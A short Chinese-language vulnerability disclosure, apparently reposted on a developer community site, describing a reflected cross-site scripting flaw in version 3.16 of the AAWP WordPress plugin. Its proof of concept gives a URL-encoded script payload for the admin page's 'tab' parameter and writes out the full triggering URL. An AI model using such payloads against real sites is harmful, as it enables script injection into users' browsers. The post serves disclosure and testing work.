WordPress AAWP 3.16 跨站脚本

原创

Khan安全团队

发布于 2022-01-14 15:16:11

4630

发布于 2022-01-14 15:16:11

文章被收录于专栏：Khan安全团队

供应商主页：https://getaawp.com/

软件链接：https://getaawp.com/

版本：3.16

测试于：Windows 10 - Chrome、WordPress 5.8.2

概念证明：

1- 安装并激活 AAWP 3.16 插件。

2- 转到 https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX

3- 添加payload到Tab，XSS Payload：%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y

4- XSS 已被触发。

转到这个网址“http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22 %40x.y" XSS 将触发。

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

登录后参与评论

0 条评论

热度